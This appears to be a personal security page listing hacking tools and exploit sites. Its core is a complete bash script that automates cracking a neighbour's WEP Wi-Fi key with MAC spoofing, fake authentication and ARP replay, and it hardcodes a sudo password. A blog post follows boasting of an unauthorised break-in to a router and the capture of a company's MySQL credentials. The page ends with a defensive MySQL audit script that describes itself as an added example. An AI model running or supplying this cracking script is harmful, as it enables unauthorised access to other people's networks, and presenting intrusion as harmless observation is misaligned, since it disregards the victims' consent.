Insecurity
Tools:
Nikto.pl Web Scanner
nmap Network Scanner
Metasploit Framework
wfuzz Brute Force Web App
Wireshark Network Protocol Analyzer
Snort IDS
Nessus (vulnerability scanner)
Hydra Password Cracker
John the Ripper Password Cracker (Passive)
Linux Distros:
BackTrack Wireless Tools and others
Damn Vulnerable Linux
Others:
http://sectools.org/
http://www.milw0rm.com/
http://www.exploit-db.com/
http://www.securityfocus.com/
Wireless Hack Bash Script
#!/bin/bash
#
# WARNING: USE AT YOUR OWN RISK!
#
# SIDE EFFECTS: UNHAPPY NEIGHBORS
#
# Author: ALbertux (Alberto Isaac Ayala Esquivias)
# Mail: <Albertux@AyalaSoft.com>
# Web: http://Albertux.AyalaSoft.com
# Script: Wireless Hack
# Tested on: Ubuntu 9.04
# A little trouble using gksudo gnome-terminal
# https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575
# gnome-terminal -e "sudo ...." # could be ...
# TERM=gnome-terminal
TERM=xterm
# A nasty function to run_like_a_root user sending the passwd
function run_like_a_root() {
sudo -S $@ << EOF
your_password
EOF
}
# Restore to normal: ./this_script.sh restore
if [ "$1" == "restore" ]; then
run_like_a_root "airmon-ng stop mon0"
run_like_a_root "/etc/init.d/networking restart"
run_like_a_root "NetworkManager"
exit 1
fi
# Set Wireless Device: ./this_script.sh wlan1
if [ -z $1 ]; then
WDEVICE=wlan0 # Could be different on your notebook
else
WDEVICE=$1 # Set Wireless Device
fi
# Stop Wireless
run_like_a_root airmon-ng stop $WDEVICE
# Kill all fu**ing process using the Wireless Device:
run_like_a_root kill -9 `run_like_a_root airmon-ng start $WDEVICE | grep ^[1-9] | awk ' { print $1 } '`
# Wireless Devices Down (we need to change the Mac)
run_like_a_root ifconfig $WDEVICE down
run_like_a_root ifconfig mon0 down
# Fake Mac, Example:
FAKEMAC=00:66:00:66:00:66
# Set Fake Mac
run_like_a_root macchanger -m $FAKEMAC $WDEVICE
run_like_a_root macchanger -m $FAKEMAC mon0
# Up the Wireless Interface
run_like_a_root ifconfig mon0 up
# See all available networks
run_like_a_root $TERM -e "airodump-ng mon0" &
# Watch the xterm loaded and write the values (maybe you need resize xterm window)
clear
echo "Network Name: "
read ESSID
echo "Network Mac: "
read BSSID
echo "Network Channel: "
read CHANNEL
echo "Close the airodump-ng xterm and press [enter]"
read
# Get Data (IVs)
run_like_a_root $TERM -e "airodump-ng mon0 -w data -c $CHANNEL --bssid $BSSID" &
# Fake Authentication Attack
run_like_a_root $TERM -e "watch aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKEMAC mon0" &
# ARP Request
run_like_a_root $TERM -e "aireplay-ng -3 -b $BSSID -h $FAKEMAC mon0" &
# Wait some time ...
echo "Press any key to launch aircrack-ng (30,000+ on data recommended)"
read
# Crack the Passwd
run_like_a_root $TERM -e "aircrack-ng data-*.cap" &
exit 0
Free Wireless on Ubuntu 9.04
Saturday Morning Hacking
This Saturday morning (the middle of the night, for me) I accompanied my aunt to a course on ANNs (Artificial Neural Networks) applied to appraisal (my aunt is an architect).
I got into an AirLink101 router (terrible password: admin); a bit bored, I started playing with the AINetSolutions page, and after a while I got the MySQL username and password.
Here is a screenshot:

I did not modify anything; I was only an observer.
Greetings to all the MHT crew, remembering old habits today.
I sent an email to the AINetSolutions people; I hope they don't mind my publishing it on my blog.
As security measures, always change the router's password and never leave the default one in place; preferably do not use remote MySQL connections, or if you need them, use an IP filter.
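The MySQL advice above (no remote connections, or an IP filter when they are needed) can be checked from a server's configuration file and account list. This is an added example, not part of the original post; the function names, input file layout and sample data are assumptions constructed for illustration.

```bash
#!/bin/sh
# Added example: audit a MySQL server for remote exposure.
# The config and account list at the bottom are constructed samples.

# Print what the [mysqld] section makes the server listen on:
# "none" (bare skip-networking), the last bind-address value, or "unset".
mysqld_listen() {
  awk '
    /^[ \t]*\[/ { in_mysqld = ($0 ~ /^[ \t]*\[mysqld\]/); next }
    !in_mysqld || /^[ \t]*[#;]/ { next }          # other sections, comments
    /^[ \t]*skip[-_]networking[ \t]*$/ { skip = 1 }
    /^[ \t]*bind[-_]address[ \t]*=/ {
      v = $0; sub(/^[^=]*=[ \t]*/, "", v); sub(/[ \t]+$/, "", v); bind = v
    }
    END { if (skip) print "none"; else print (bind == "" ? "unset" : bind) }
  ' "$1"
}

# $1 = my.cnf path
# $2 = file of "user host" pairs, e.g. saved from: SELECT user, host FROM mysql.user;
audit_mysql_exposure() {
  listen=$(mysqld_listen "$1")
  case "$listen" in
    none|127.0.0.1|::1|localhost) echo "OK   listener is local only ($listen)" ;;
    # "unset" lands here too: without bind-address MySQL listens on all interfaces
    *) echo "WARN listener reachable from the network (bind-address=$listen)" ;;
  esac
  while read -r user host; do
    [ -n "$user" ] || continue                     # skip blank lines
    case "$host" in
      localhost|127.0.0.1|::1) ;;                  # local-only account
      ''|%) echo "WARN account $user accepts connections from any address" ;;
      *) echo "INFO account $user is limited to host pattern $host" ;;
    esac
  done < "$2"
}

# Constructed sample input
demo_dir=$(mktemp -d)
cat > "$demo_dir/my.cnf" <<'EOF'
[mysqld]
# bind-address = 127.0.0.1
bind-address = 0.0.0.0
EOF
printf '%s\n' 'root localhost' 'webapp %' 'report 192.0.2.10' > "$demo_dir/accounts.txt"
audit_mysql_exposure "$demo_dir/my.cnf" "$demo_dir/accounts.txt"
```

Each WARN line corresponds to one half of the advice: bind the listener to localhost, and replace `%` hosts with the specific addresses that need access.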